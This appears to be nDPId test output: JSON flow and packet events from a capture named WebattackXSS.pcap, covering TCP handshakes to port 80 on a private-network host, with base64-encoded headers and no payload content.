-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347296462,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347296462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TjBAAD4Gd6CsEAABwKgKMtmGAFCTXWbOAAAAAKACchBgyQAAAgQFtAQCCAoBOij+AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347296462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2YaJqN5wk11mz6AScSD7NQAAAgQFtAQCCAoD4\/p1AToo\/gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":3,"flow_last_seen":1499347296463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347296463,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TjFAAD4Gd6esEAABwKgKMtmGAFCTXWbPiajecYAQAOWaPAAAAQEICgE6KP8D4\/p1"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347297732,"flow_last_seen":1499347297732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347297732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55700,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1499347297732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LW1AAD4GmGOsEAABwKgKMtmUAFB7SgdRAAAAAKACchDXDQAAAgQFtAQCCAoBOio8AAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2753,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1499347297733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347297733,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ZST\/kF5e0oHUqAScSAC3wAAAgQFtAQCCAoD4\/uyAToqPAEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2754,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":3,"flow_last_seen":1499347297733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347297733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LW5AAD4GmGqsEAABwKgKMtmUAFB7SgdSk\/5BeoAQAOWh5gAAAQEICgE6KjwD4\/uy"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347300263,"flow_last_seen":1499347300263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347300263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55726,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1499347300263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bohAAD4GV0isEAABwKgKMtmuAFBvk0I9AAAAAKACchClRQAAAgQFtAQCCAoBOiy1AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1499347300263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347300263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2a7Gy0E5b5NCPqAScSCcEAAAAgQFtAQCCAoD4\/4rATostQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1499347300264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347300264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bolAAD4GV0+sEAABwKgKMtmuAFBvk0I+xstBOoAQAOU7GAAAAQEICgE6LLUD4\/4r"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347301520,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347301520,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80Q9AAD4G9MCsEAABwKgKMtm8AFCdpvzgAAAAAKACchC7RgAAAgQFtAQCCAoBOi3vAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347301520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2bw9W3Mnnab84aAScSAIWgAAAgQFtAQCCAoD4\/9lATot7wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2784,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1499347301521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347301521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00RBAAD4G9MesEAABwKgKMtm8AFCdpvzhPVtzKIAQAOWnYQAAAQEICgE6Le8D4\/9l"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347303701,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347304125,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347304125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hKxAAD4GQSSsEAABwKgKMtnWAFBzErTWAAAAAKACchArQAAAAgQFtAQCCAoBOjB6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347304125,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2dawo5LBcxK016AScSDi5QAAAgQFtAQCCAoD5AHwATowegEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":3,"flow_last_seen":1499347304126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347304126,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK1AAD4GQSusEAABwKgKMtnWAFBzErTXsKOSwoAQAOWB7AAAAQEICgE6MHsD5AHw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347305402,"flow_last_seen":1499347305402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347305402,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1499347305402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z+xAAD4GXeSsEAABwKgKMtnkAFD8k1ZWAAAAAKACchD+8AAAAgQFtAQCCAoBOjG6AAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1499347305402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347305402,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2eSBOT6p\/JNWV6AScSA42QAAAgQFtAQCCAoD5AMwAToxugEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1499347305403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347305403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z+1AAD4GXeusEAABwKgKMtnkAFD8k1ZXgTk+qoAQAOXX4AAAAQEICgE6MboD5AMw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347306680,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347306680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t61AAD4GDiOsEAABwKgKMtnyAFBPt4VUAAAAAKACchB7ggAAAgQFtAQCCAoBOjL5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347306680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2fJOMjqdT7eFVaAScSDrPgAAAgQFtAQCCAoD5ARvAToy+QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1499347306680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347306680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t65AAD4GDiqsEAABwKgKMtnyAFBPt4VVTjI6noAQAOWKRgAAAQEICgE6MvkD5ARv"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347309314,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347309314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V4pAAD4GbkasEAABwKgKMtoMAFADiWIGAAAAAKACchDoUQAAAgQFtAQCCAoBOjWMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":2,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347309314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2gztcSluA4liB6AScSDHagAAAgQFtAQCCAoD5AcCATo1jAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1499347309314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347309314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V4tAAD4Gbk2sEAABwKgKMtoMAFADiWIH7XEpb4AQAOVmcgAAAQEICgE6NYwD5AcC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347310567,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347310567,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8riNAAD4GF62sEAABwKgKMtoaAFDhF5jmAAAAAKACchDSmwAAAgQFtAQCCAoBOjbFAAAAAAEDAwc="} 
